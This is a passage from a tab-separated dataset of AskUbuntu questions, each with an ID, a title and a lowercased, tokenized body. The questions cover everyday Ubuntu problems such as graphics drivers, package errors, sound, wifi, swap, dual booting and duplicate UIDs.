ib_put 0x00000296 state 0x80000024 ( err : invalid_cmd ) push 0x00400040 mar 1 17:30:00 nick-pc kernel : [ 2647.018384 ] nouveau e [ pfifo ] [ 0000:01:00.0 ] dma_pusher - ch 3 [ xorg [ 1102 ] ] get 0x002003a7f0 put 0x002003d44c ib_get 0x00000194 ib_put 0x00000195 state 0x80004861 ( err : invalid_cmd ) push 0x00502031 mar 1 17:30:00 nick-pc kernel : [ 2647.019477 ] nouveau e [ pfifo ] [ 0000:01:00.0 ] dma_pusher - ch 3 [ xorg [ 1102 ] ] get 0x002003d44c put 0x002003d44c ib_get 0x00000194 ib_put 0x00000197 state 0x80000000 ( err : invalid_cmd ) push 0x00400040 ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ mar 1 17:36:08 nick-pc kernel : imklog 5.8.11 , log source = /proc/kmsg started . thank you , nick
427107	why can i create users with the same uid ?	my understanding of uids is that is a unique positive integer assigned by a unix-like operating system to each user . each user is identified to the system by its uid , and user names are generally used only as an interface for humans . how can two users have the same uid , is n't this a conflict for my system and packages ? root @ kdc : ~ # id test12 uid=1005 ( test10 ) gid=1000 ( server ) groups=1005 ( test10 ) root @ kdc : ~ # id test13 uid=1005 ( test10 ) gid=1000 ( server ) groups=1005 ( test10 ) root @ kdc : ~ # i 've added two users with same uid and gid : test12 and test13 the output of /etc/passwd : client @ kdc : ~ $ cat /etc/passwd | grep test12 test12 : x:1005:1000 : :/home/test12 : /bin/sh client @ kdc : ~ $ cat /etc/passwd | grep test13 test13 : x:1005:1000 : :/home/test13 : /bin/sh i added the users by useradd -ou 1005 -g1000 username . i got confused what is the purpose of this , and can it affect permissions and user logs etc . so now if a user is added with uid=0 and gid=0 will has privileges like a root account ?
427109	alternative graphic drivers ?	my graphics graphics card is a radeon hd 4250 and ati has dropped the support for x-server version higher than 1.12 . are there any alternative graphic drivers i can use besides the opensource driver , gallium 0.4 . if not what 's the best config i can do to boost performance so that it 's similar to the proprietary driver . i 'm running ubuntu 13.10 64bit , and my graphics are : gallium 0.4 on amd rs880 .
427113	unable to install software in line	i am unabl to install the vlc player or any other software . i have tried , apt update , updgrade , auto clean , auto remove but nothing works . here what it shows when i try to install vlc . ** > $ sudo apt-get install vlc > reading package lists ... done building > dependency tree reading state information ... done some packages > could not be installed . this may mean that you have requested an > impossible situation or if you are using the unstable distribution > that some required packages have not yet been created or been moved > out of incoming . the following information may help to resolve the > situation : the following packages have unmet dependencies : vlc : > depends : vlc-nox ( = 2.0.8-0ubuntu0.12.04.1 ) but it is not going to be > installed > depends : libavcodec53 ( > = 4:0.8-1~ ) but it is not going to be installed or > libavcodec-extra-53 ( > = 4:0.8-1~ ) but it is not going to be installed > depends : libsdl-image1.2 ( > = 1.2.10 ) but it is not installable > depends : libtar0 but it is not installable > depends : libva-x11-1 ( > 1.0.15~ ) but it is not installable > depends : libva1 ( > 1.0.15~ ) but it is not installable > depends : libxcb-keysyms1 ( > = 0.3.8 ) but it is not installable > recommends : vlc-plugin-notify ( = 2.0.8-0ubuntu0.12.04.1 ) but it is not going to be installed > recommends : vlc-plugin-pulse ( = 2.0.8-0ubuntu0.12.04.1 ) but it is not going to be installed > e : unable to correct problems , you have held broken packages . **
427114	dissable putty tabcompletion sound	when i connect to a windows computer with ssh to ubuntu server . and i use tabcompletion and there are multiple option i hear a geluiid this is sometimes very annoying . is there a way that i can turn off that sound
427118	upgrade boost 1.49.0.1 to 1.54 on ubuntu 12.10	had stability issues with 13.10 and problems with secure boot on 12.04 so currently using ubuntu 12.10 . i have used the regular boost installation command from the terminal but because i am on 12.10 it has installed boost 1.49 . could somebody please provide a set of terminal commands i can execute to `` upgrade '' from boost 1.49 to 1.54 ? thanks in advance
427120	crontab wont run a script	i 've set a script to run every 10 minutes using cron , but it does not run . it works when i run it manually . bin path is /usr/bin/ . the script contains : # ! /bin/bash scrot 'screenshot.png ' -e 'mv $ f /mnt/ftp/screenshots/'
427125	teamviewer does not start automatically , how do i make sure it does ?	after installing teamviewer x86 on ubuntu , it will not start automatically on boot , even when telling it to do so via the application settings ( `` start teamviewer with system '' ) . how do i make sure teamviewer starts with the system , before even logging in ?
427128	default path changed after uninstalling python and reinstalling ubuntu-desktop	i was trying to uninstall python3 from ubuntu 12.04 with the following command : sudo apt-get remove -- purge python3* and it just remove many things from system , including the ubuntu-desktop . after that , i reinstalled the desktop with the command : sudo apt-get install ubuntu-desktop the problem is that , when i open a terminal , it shows me a ~ sign on top off the screen , and did n't start from home , as in nilson @ ghostrider~ $ what 's wrong and how can i correct this ? for details see the marked area in the following picture :
427136	libreoffice can not find file	i wrote a really important document and saved it under documents folder . when i restarted my computer i discovered i can not find the file in it 's location . when i opened writer it tells me i need to restore the file , but when i click next it can not find the file and says the restoration failed . what can i do ?
427139	keyboard/mouse not working after installation from windows	i installed ubuntu 12.04 from windows 7 via windows installer . it completed ( i guess ) successfully . the problem occurs when i start ubuntu . neither mouse nor keyboard work ( both usb ) . i ca n't type in the password . sorry if the question is a duplicate . update : keyboard and mouse work on usb 3.0 ports but not on others . what should i do ? i do n't want to waste 3.0 on keyboard and mouse .
427143	unable to open software center and updatemanager	i deleted opt.conf.d folder in /etc/apt and i copied a new one from live dvd after this my software center , update manager , are not able to open . when i open software center it is giving me an error message . systemerror : e : unable to read /etc/apt/apt.conf.d/ - opendir ( 13 : permission denied ) but i am able to open synaptic .
427145	what is the meaning of `` @ installed_at @ '' in a bash file	i have a bash scripts that contains the following lines : my_home= '' @ installed_at @ '' ld_library_path= '' @ installed_at @ /lib '' my_bin= '' @ installed_at @ /bin '' export my_home export ld_library_path exec `` $ my_bin/my.bin '' $ { 1+ '' $ @ '' } i am particulary confused by @ installed_at @ . specifically , what does my_home= '' @ installed_at @ '' do ?
427150	dual-boot windows7/ubuntu want to take ubuntu off and replace with mint	so i have already dual booted my hp laptop with windows 7 and ubuntu 13.04 and i wanting to take ubuntu 13.04 off and replace it with mint . my problem is i 'm worried if i delete the ubuntu partition it will delete grub making it so i ca n't boor windows . i was thinking i could delete the ubuntu partition . then boot mint from a usb drive and install mint and grub at the same time . would this work or do i need to fix the windows 7 mbr first ?
427151	i think about adding a second hard drive to my laptop	i have a lenovo ideapad z580 laptop and i want to replace the dvd drive with a 16gb ssd drive . now i have just 2 partitions on my hard drive ( / and /home ) , after adding the ssd drive i want to use it like the current partition mounted in / and my hdd like the current partition mounted in /home . is it possible ? has somebody tried this method to use ubuntu ?
427152	installation using wubi stops after reboot	i am trying to install ubuntu-13.10-desktop-amd64 using wubi . i assigned 13gb and filled up everything required in the wubi installer . after rebooting the system i get the following error : try ( hdd0,0 ) ntfs5 : error `` prefix '' not set and the says completing installation . but the installation stops . only the background image is seen and nothing happens . even the hdd blinking light stops blinking . i even tried to go to safe mode and demo mode through grub but nothing happened .
427153	change expired password via ssh	i have added some new users and set default passwords . using chage -d 0 , i have expired them , hoping that they will be prompted to change their passwords the first time they login . unfortunately , the only way this machine is accessed is via ssh . when the user ssh 's to the box , they get : your account has expired ; please contact your system administrator i checked /var/log/auth.log , and found the following : feb 27 10:19:01 gitlabci sshd [ 6793 ] : pam_unix ( sshd : account ) : account < user > has expired ( account expired ) feb 27 10:19:01 gitlabci sshd [ 6793 ] : failed password for < user > from < my_ip > port 1939 ssh2 feb 27 10:19:01 gitlabci sshd [ 6793 ] : fatal : access denied for user < user > by pam account configuration [ preauth ] i do n't see any configuration options in /etc/ssh/sshd_config that will allow the prompt for a new password . anybody have any suggestions ? thanks , steve
427156	i would like to remove windows 8 and install ubuntu , without a cd or usb drive	i have a windows 8 laptop , that i can not factory reset because of some error ( it just wo n't do it . i 've tried a lot of different things and the error persists ) . so i 'd like to just wipe my hd and do a clean install of ubuntu on this machine . i do not have a dvd-r or a flash drive to make a livecd/usb with at the moment . i do have access to the internet , with a wired or wireless connection , and it is fairly fast , so net installs would be a possibility . can someone point me towards a decently simple-to-understand walkthrough of the process ? and if not , do i have any other options here at all ? keep in mind that i do not want to dual-boot , or keep windows 8 in any form on this laptop . i want to completely wipe windows 8 off my hard drive , and install ubuntu instead . edit thanks everyone for the answers , looks like i 'm just going to go on ahead and buy an inexpensive usb drive and just do it that way , after all . i 'm new to askubuntu so i am not sure if there is a way to mark this question as `` asnwered '' or `` resolved '' .
427157	desktop suddenly freezes	i noticed my desktop was frozen yesterday , unresponsive to any keystroke or mouse input.. i do n't commonly use it - have not used it in over 30 days . was forced to use the reset button . when it came back to the desktop , it had a 180mb of automatic updates it wanted to run . i let it do so , and rebooted , ran fine last night . this morning , my desktop will suddenly freeze to the point that the keyboard lights stop functioning and the machine must be reset with the reset button . this will occur when the machine is not even in use , sitting idle overnight .
427162	additional drivers not found now that i have switched motherbaords	so , long story short my asus p8z77-v pro died on sunday ( the second one i 've had die ) so i got myself an asrock p77 extreme4 to tide me over/replace it . problem is that when i goto install my nvidia proprietary drivers ubuntu can not find any . the 'additional drivers ' searches and finds nothing . i have downloaded the latest directly from nvidia to try a manual install tonight but i 'd rather have this simple and useful feature work . does anyone know how to troubleshoot this ? side note : i used the same flash disk to install 13.10 and everything else seems to work , even the 2 displays coming off of this gfx card , just not using decent drivers that support opengl etc ... thanks ,
427164	how to block all traffic except for browsing ?	sorry for the paranoid question but is it possible to block all connections except for firefox and updates ? and if so does someone got a terminal code for it ?
427166	touchpad is not showing in system hardware list	i have an acer aspire 4752 laptop and after installing ubuntu 13.10 the touch-pad hardware is not showing in system and i am working with an usb mouse . i also want to update my bios , please help me . i received this data when running xinput in the terminal : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ usb optical mouse id=12 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ sleep button id=8 [ slave keyboard ( 3 ) ] ↳ 1.3m hd webcam id=9 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=10 [ slave keyboard ( 3 ) ] ↳ acer wmi hotkeys id=11 [ slave keyboard ( 3 ) ]
427169	ca n't install/try ubuntu after dd sda hard drive	i mistakenly ran dd on sda which is the current hard-drive ubuntu installed on . i aborted dd ( using ctrl-x ) and when rebooted the machine it no longer boots with ubuntu : ( i have nothing important on the machine , so i do n't care to lose everything on it . trying to install ubuntu from disk-on-key did n't work ( error : umount : /dev device busy ) tried to use repair-boot from disk-on-key and still did n't work ( says everything finished successfully , but after rebooting i get the same errors ) my question is : do you have any idea how i can have ubuntu installed on the machine ( again , do n't care to lose everything on it ) ?
427174	ubuntu switches sound device when headphones are plugged in	i have two devices for sound output : always when i plug in my headphones or external speakers - for whatever reason - the digital output gets selected which means in this case that i have no sound at all . how can i keep the from system switching the device ?
427176	cups print delays	i am a developer of an open source java printing plugin for the web browser and we have a client that reports 250ms delay in printing on ubuntu , but no other os . he has tested printing on windows and osx without issues . in our test lab we are able to reproduce this delay . although minor , this affects the capabilities of an ubuntu kiosk he is developing . we would like to obtain paid support for this issue to quickly address it ( rather than spend time searching ) however the canonical support form tells us our deployment size is too small for a support plan and instead directs me to this page . : ) has anyone else experienced such an issue ? i can not imagine this a very common concern among desktop users since this specific need for real-time printing is only going to affect industry application ( i.e . time critical production use ) , but i 'm certain we are n't the first to try this , nor report this . google has offered some suggestions but we 've tried every sensible one to no avail . our printer uses a generic/text driver , hardware is a brand new epson tm88v and we are using java to issue the commands to the printer . the source code for our software is located here : http : //www.qzindustries.com/download ( lgpl 2.1 ) the tutorial we give our customers is located here : http : //www.qzindustries.com/tutorialrawubuntu any advice on this matter is well appreciated . edit : this bug report may be related : https : //bugs.launchpad.net/ubuntu/+source/cups/+bug/1001028 -tres finocchiaro
427177	how to repair bad sectors on ntfs partition	i accidentally unplug the power line of my laptop , which seems cause some bad sectors on my hard drive . the partitions of that hard drive are all in ntfs format , is there a tool or a way to repair it under ubuntu ?
427180	appmenu with qml app	i 'm developing an ubuntu sdk meant to be used on both the desktop and touch interfaces . obviously the menu that slides up from the bottom of the window is not a great interface for the desktop . i 'd like to be able to redundantly add the items there to a normal application menu ( appmenu ) to be used on the desktop . how can this be done in a qml application ? i 've found no documentation , only a mention of the possibility in qt here : http : //blog.qt.digia.com/blog/2011/08/26/toplevel-windows-and-menus-with-qt-quick/ edit : i found mention of the library needed in the question are qt quick controls available on ubuntu 13.10 ? . if i can turn that into a solution , i 'll post the answer . edit : after adding the ubuntu-sdk-team/ppa and canonical-qt5-edgers/qt5-proper ppas and upgrading , i still do n't have qtquick.controls . and yes , i 'm running trusty . update : it seems that the packages are in place in trusty now , and the import of qtquick.controls is working correctly . however , when i add a menu to my app , it has no effect . no menu appears . any advice ? update : i tried again since the release of 14.04 , but nothing changed . i tried ubuntu.hud ( code in this sudoku app ) , an actions attribute ( later in the sudoku app , even trying to use applicationwindow ( which does n't exist ) , but the menu simply does not appear on the window , and dragging up the menu from the bottom does n't show the touch hud . and since it always gives the `` must provide app_id environmental variable or hud will not work '' error when running , i ran it from the terminal with an app_id set . still nothing . window { visible : true width : units.gu ( 40 ) height : units.gu ( 75 ) title : `` my app '' menubar { menu { title : `` file '' menuitem { text : `` quit '' } } } mainview { id : root // objectname for functional testing purposes ( autopilot-qt5 ) objectname : `` mainview '' // ...
427182	what download do i need for windows 7 64bit	i have windows 7 on a 64 bit dell latitude and want to install ubuntu in such a way to have windows there , but under control of ubuntu so i can eventually eliminate microsoft altogether . where do i begin ?
427184	i disabled my admin account and now i ca n't log in no guest account	so i just bought a used sony vaio with the ubuntu operating system . i disabled my admit account thinking that when i powered up it would just go to the home screen . now i ca n't log in . it recognizes my user name but not the password . how can i get passed the log in screen ?
427185	how can i restore my audio to menu bar ?	i 'm having problems with my headphones not working all of a sudden on ubuntu 13.10 . i tried fixing it by changing a bunch of files , removing alsa-mixer and pulseaudio and reinstalling . still have n't got audio in my headphones , but what is worse ( i think ) , i ca n't see the audio widget in the menu bar at the top of the screen . how can i restore that ? i thought reinstalling alsa and pulseaudio and rebooting would bring it back , but it has n't . see screenshot , to see that there is no audio icon at the top right
427187	how to remap pgup and pgdown to home and end thinkpad x1 carbon ubuntu 13.10 gnome-shell	i have used the xmodmap technique , i even made a file called .xmodmap and put it in the start up commands in the gnome tweak tool , but there are still occasions where the buttons do n't perform what i specified . i know because opening my terminal and doing `` xmodmap ~/.xmodmap '' fixes the behavior to what i need . any ideas on what might not be working right here ?
427190	how do i use plasma-widget-wifi	i am trying to use the plasma-widget-wifi widget to monitor my wifi connecions . i installed it but now have no clue how to to put it on my desktop , i am using 12.04 lts . anyone know how to do this ? i find it hard to believe no one on this site knows how to install widgets . if no one has an answer can you at least tell me where i can find information regarding my question ?
427191	installation problem libssh2-php on ubuntu 13.10	new here , be gentle ... i am setting up a server using ubuntu server 13.10 64 bit . so far all went well , but now running into a problem during installation of libssh2-php . setting up libssh2-php ( 0.11.3-0.1build2 ) ... creating config file /etc/php5/conf.d/ssh2.ini with new version cp : can not create regular file 창/etc/php5/conf.d/ssh2.ini창 : no such file or directory dpkg : error processing libssh2-php ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : libssh2-php e : sub-process /usr/bin/dpkg returned an error code ( 1 ) tried sudo apt-get remove -- purge libssh2-php followed by reinstalling , no luck . when i check /etc/php5/ , there is a /etc/php5/apache2/conf.d and a /etc/php5/cli/conf.d directory but no /etc/php5/conf.d directory . edit php version 5.5.3 any suggestions welcome ... thanks !
427195	problems with keyboard shortcuts in gnome 3.10	since i installed gnome 3.10 on my ubuntu 13.10 my terminal shortcut , print screen and volume controls stopped working . does anybody know which package i can downgrade , so that it works again ?
427196	ubuntu 12.04 hangs on desktop after password screen ?	i 'm currently dual booting into 12.04 lts and it 's been working really well . recently though my boot time has been taking quite a while . it loads fine until after i enter my password . then the monitor shows a my desktop wallpaper for 30 or longer seconds before displaying any desktop icons or any elements of unity . here 's my system log : http : //pastebin.com/jm8j6tdx here 's my kern.log : http : //pastebin.com/972h5sgx any help would be much appreciated ! comment if you need more information about my set up . thanks
427198	new password not accepted	i followed the steps for resetting the password on ubuntu 13 . it all worked until i entered a new password , then i got the message `` authentication manipulation error '' -password unchanged . this was followed by the rootuser oem prompt . trying a different password has the same result . clive
427205	ca n't get any soud from speakers	i 'm fairly new to linux and i 've just installed ubuntu and i get sound from my headphones no matter which output i use from my pc , but the speakers does n't work . i 've tried every solution i found on the internet . tried removing pulseaudio installing gnome alsa-mixer added options snd-hda-intel model=generic to sudo gedit /etc/modprobe.d/alsa-base.conf & and all sorts of different techniques without sucess . please can you help me ? !
427206	booting ubuntu via virtualbox on win7 goes to black screen after this prompt	! [ gnu grub screen ] http : //imgur.com/oug6f5s 99 % of the time the first option is selected by virtualbox in under 3 seconds , the other 1 % it pauses for me to actually choose . no matter the option i choose , the next screen will be a black screen with an unblinking prompt and that 's it . additionally , virtualbox is being initiated via a vagrant up on windows 7 via a cygwin commandline . i 'd appreciate as many ideas as possible , random spitballs are also welcome !
427208	how do i add an auto updating file with dyndns ?	i am trying to map my internal ip to my external ip . i have no option for a static ip and wanted to achieve my iptables configuration through webmin . so what i thought was , to simplify the iptables config ; map an eth1 interface in /etc/network/interfaces to my outfacing network , then open the ports . but i am using a dyndns duc client because my isp does n't provide fixed external ips . could anybody help me out or link me a cron script to base this off so that i can update the /etc/network/interfaces file when my ip changes and remap it to my home network . thank you
427213	ca n't find device when trying to install ubuntu	i am trying to install ubuntu and when i am presented with the partitioning menu i have no devices that i can select . however from the `` try ubuntu '' area i can see my hard drive mounted . how can i troubleshoot this ?
427214	sli and drivers	i currently have ubuntu solely installed on a lenvo y500 with nvidia650m sli , i am running nvidia driver version 319 ( tested ) . i can not turn sli on though , using the ( sudo nvidia-xconfig -- sli= ) command i have tried every option off , on , auto , afr , sfr , aa , afrofaa , mosaic and all of them crash when opening games ( except of course off ) . so how do i turn on my sli ? do i need different drivers ?
427216	wastebin full error in kubuntu	i 'm trying to delete files from a usb flash drive and i get the following message : the wastebin has reached its maximum size ! empty the wastebin manually . there are no files in the wastebin and the empty button is greyed out . how can i solve this ? also is there a way to change the amount of data that the wastebin can hold ?
427218	rubymine crash on strart	i 'm trying to launch rubymine on ubuntu 13.10 . but i get an error : a fatal error has been detected by the java runtime environment : sigsegv ( 0xb ) at pc=0x00007f3c371c010e , pid=3624 , tid=139896602744576 jre version : java ( tm ) se runtime environment ( 7.0_51-b13 ) ( build 1.7.0_51-b13 ) java vm : java hotspot ( tm ) 64-bit server vm ( 24.51-b03 mixed mode linux-amd64 compressed oops ) problematic frame : c [ libt2k.so+0x4210e ] fnt_innerexecute+0x6e core dump written . default location : /home/user/software/rubymine-6.0.3/bin/core or core.3624 an error report file with more information is saved as : /home/user/software/rubymine-6.0.3/bin/hs_err_pid3624.log if you would like to submit a bug report , please visit : http : //bugreport.sun.com/bugreport/crash.jsp the crash happened outside the java virtual machine in native code . see problematic frame for where to report the bug . aborted ( core dumped ) if i start it as a root - everything is ok .
427225	how do i change the default overflow size in ubuntu	google is failing me , it appears in some systems it 's located in a ( script ) file called mountoverflowtmp under /etc/init.d/ however it does n't appear to be there in ubuntu , and i 'm not having any luck finding it anywhere on ubuntu 12.04 . where can i configure it ? i 'd like to change the default from the relatively useless 1mb size to something like 256mb . thanks .
427228	how fix ati fglrx driver after kernel upgrade	i upgraded to the 12.04.4 lts saucy stack from 12.04.3 : sudo apt-get install -- install-recommends linux-generic-lts-saucy xserver-xorg-lts-saucy libgl1-mesa-glx-lts-saucy that installed the 3.11 kernel to go with the 3.8 i had previously . however , when logging in i see i am in fallback mode , and fglrx is nowhere to be seen , from xorg.0.log : loading extension glx fatal : module fglrx not found . ( ww ) fglrx : no matching device section for instance ( busid pci:0 @ 0:1:1 ) found fatal : module fglrx not found . loading extension fglrxextension i cant load it directly either : > sudo modprobe fglrx fatal : module fglrx not found . if i boot with the old 3.8 kernel everything is hunkey-dorey . no probs at all . i think this might be some kind of dkms problem . in /lib/modules i have : drwxr-xr-x 4 root root 4096 feb 10 20:43 3.8.0-35-generic drwxr-xr-x 4 root root 4096 feb 24 20:36 3.11.0-17-generic however : > ls -l /var/lib/dkms/fglrx/13.251/ total 8 drwxr-xr-x 3 root root 4096 feb 5 22:05 3.8.0-35-generic drwxr-xr-x 4 root root 4096 feb 24 20:36 build lrwxrwxrwx 1 root root 21 dec 27 17:06 source - > /usr/src/fglrx-13.251 shouldnt there be a 3.11 kernel entry there ? how to i refresh dkms to see the new kernel that just got installed ? or is that not the problem ?
427230	why ca n't i get online ? ( the conference wifi question )	i am trying to troubleshoot hotel wfi that seems to work for everyone but me . even my phone is connecting just fine . but not my saucy salamander laptop . in /var/log/syslog i see a lot of `` wlan0 : send auth to ... 1/3 '' ( and 2/3 and 3/3 ) and '' supplicant interface state : disconnected - > scanning '' ( or authenticating -- > disconnected ) . any tips on how to get better diagnostic information ?
427231	simple bookkeeping software	looking for recommendations for simple bookkeeping software for linux . basic check register . prefer to be able to transfer existing basic data from quicken if possible .
427233	what is the uuid of my swap drive ?	i 'm dual-booting ubuntu 13.10 on an asus windows 8 with an ssd ( but not on the ssd ) . i configured it when installing to use a swap drive , but it does n't seem to be using it since i get this message on the load screen : could not mount /dev/mapper/cryptswap1 m for manual s for skip and my linux os keeps crashing . here 's my question : i can see two different uuid 's for my swap drive : one from sudo blkid | grep swap : /dev/mapper/cryptswap1 : uuid= '' a08247f7-a5d9-4d5a-bde7-41339a41ed42 '' type= '' swap '' and one from sudo nano /etc/fstab : # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda8 during installation uuid=1507d33a-9aed-4091-8d5f-b0d27434f9fc / ext4 errors=remoun $ # /boot/efi was on /dev/sda1 during installation uuid=c61b-97cb /boot/efi vfat defaults 0 1 # swap was on /dev/sda9 during installation # uuid=375639c1-f7b0-4428-a47f-7fdae8f899eb none swap sw $ /dev/mapper/cryptswap1 none swap sw 0 0 i 'm wondering should i change the uuid in fstab to the one that i get from blkid ? also , i can see the same uuid when i search ls -l /dev/disk/by-uuid/ . would it be a problem for me to try changing the swap uuid in fstab ( and uncomment ) , or am i wrong in assuming that i should , or is there a more proper way to fix this problem ? output of free total used free shared buffers cached mem : 5995912 5030668 965244 0 15588 1169388 -/+ buffers/cache : 3845692 2150220 swap : 8000508 124356 7876152
427234	facebook only wont load on ubuntu 13.10	facebook is the only page that wont load properly on my laptop . it just loads the basic text version . no matter what internet connection or browser i use the problem still exists . and even booting a different os through a virtual box and i still have the same problem . facebook is the only webpage that this happens on , everything else is perfect
427235	problem 12.10 to 13.10 upgrade	i tried to upgrade to 13.10 from 12.10 but the computer turned of during upgrade and now the computer says that it has both 13.10 and 12.10 installed and the terminal does n't seem to work ( but maybe the commands i am trying to use have been removed/changed in 13.10 likesudo apt-get install i also have an error that says : error : brokencount > 0 ' .
427237	named pipes always open for writing	i want to make a named pipe that is always open for reading and writing . so i typed this in to the terminal : mkfifo testpipe exec 3 < > testpipe all is working correct . but when i make a shell script with those commands it only makes a named pipe . its not making it open for reading and writing . anyone know a solution ?
427239	rt3920 bluetooth not found in settings or rfkill list	i have an issue with my built in railink rt3920 bluetooth unit for my hp envy m6 laptop . there is an flight mode button on my laptop , so if i press f12 , i disable/enable wireless activity . what frustrates me , is that it 's lit red ( off ) but my wifi is still working , but i can not re-enable the bluetooth . and if i go to terminal and do rfkill unblock all rfkill list all the bluetooth is not even listed , all it says , is the wifi is neither hard- nor soft-blocked . and yes , i installed ubuntu and removed windows 8 , as i hated it . i really need the bluetooth to work , so any help is much appreciated !
427240	ralink rt3062 run by rt2800pci does not work in new ubuntu 13.10 install neither does another ralink card in a separate pci slot	so after a fresh install both pci cards ( for different pci slots ) have stopped working . here is the information that might be helpful . i 've tried so many ideas and spent hours on this any help would be greatly appreciated : lshw output : *-network description : wireless interface product : rt3062 wireless 802.11n 2t/2r vendor : ralink corp. physical id : 5 bus info : pci @ 0000:01:05.0 logical name : wlan0 version : 00 serial : 48:02:2a:8f:96:1a width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rt2800pci driverversion=3.11.0-17-generic firmware=0.34 latency=32 link=no maxlatency=4 mingnt=2 multicast=yes wireless=ieee 802.11bgn resources : irq:20 memory : fea00000-fea0ffff nm-tool output : state : connected ( global ) device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : connected default : yes hw address : 14 : da : e9:08:8b:33 capabilities : carrier detect : yes speed : 1000 mb/s wired properties carrier : on ipv4 settings : address : 192.168.1.81 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.254 dns : 192.168.1.254 dns : 75.153.176.1 device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : rt2800pci state : disconnected default : no hw address : 48:02:2a:8f:96:1a capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points metacomg01n2 : infra , 30:85 : a9 : aa:9c:58 , freq 2422 mhz , rate 54 mb/s , strength 44 wpa wpa2 telus1000 : infra , 20:76:00 : c4 : c2:18 , freq 2412 mhz , rate 54 mb/s , strength 97 wpa wpa2 output of lsmod ( this is where things seem strange possibly ? ) module size used by ipheth 13448 0 snd_hda_codec_realtek 56405 1 snd_hda_codec_hdmi 41117 1 snd_hda_intel 52267 10 snd_hda_codec 188738 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel snd_hwdep 13602 1 snd_hda_codec radeon 1408117 2 kvm_amd 59987 0 snd_pcm 102033 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel kvm 431720 1 kvm_amd arc4 12608 2 snd_page_alloc 18710 2 snd_pcm , snd_hda_intel snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi snd_rawmidi 30095 1 snd_seq_midi joydev 17377 0 rt2800pci 18719 0 snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi rt2800lib 79992 1 rt2800pci eeepc_wmi 13151 0 asus_wmi 24191 1 eeepc_wmi sparse_keymap 13948 1 asus_wmi video 19318 1 asus_wmi snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi rt2x00pci 13287 1 rt2800pci snd_timer 29433 2 snd_pcm , snd_seq rt2x00mmio 13603 1 rt2800pci rt2x00lib 55362 4 rt2x00pci , rt2800lib , rt2800pci , rt2x00mmio mac80211 597268 3 rt2x00lib , rt2x00pci , rt2800lib ttm 84169 1 radeon drm_kms_helper 52710 1 radeon cfg80211 480503 2 mac80211 , rt2x00lib drm 297056 4 ttm , drm_kms_helper , radeon psmouse 97655 0 snd 69141 31 snd_hda_codec_realtek , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi microcode 23656 0 eeprom_93cx6 13344 1 rt2800pci crc_ccitt 12707 1 rt2800lib soundcore 12680 1 snd btusb 28267 0 serio_raw 13413 0 k10temp 13126 0 i2c_algo_bit 13413 1 radeon wmi 19070 1 asus_wmi i2c_piix4 22106 0 mac_hid 13205 0 parport_pc 32701 0 ppdev 17671 0 rfcomm 69130 16 bnep 19704 2 bluetooth 372041 22 bnep , btusb , rfcomm lp 17759 0 parport 42299 3 lp , ppdev , parport_pc ext2 72949 1 hid_generic 12548 0 usbhid 53014 0 hid 101762 2 hid_generic , usbhid pata_acpi 13038 0 r8169 67581 0 mii 13934 1 r8169 ahci 25819 2 pata_atiixp 13271 0 libahci 32009 1 ahci iwconfig output : eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed frequency:2.417 ghz access point : not-associated tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off this also seems strange what is lo ? thank you for any help ! here is the added nm-tool while ethernet is disconnected : networkmanager tool state : disconnected device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unavailable default : no hw address : 14 : da : e9:08:8b:33 capabilities : carrier detect : yes speed : 1000 mb/s wired properties carrier : off device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : rt2800pci state : disconnected default : no hw address : 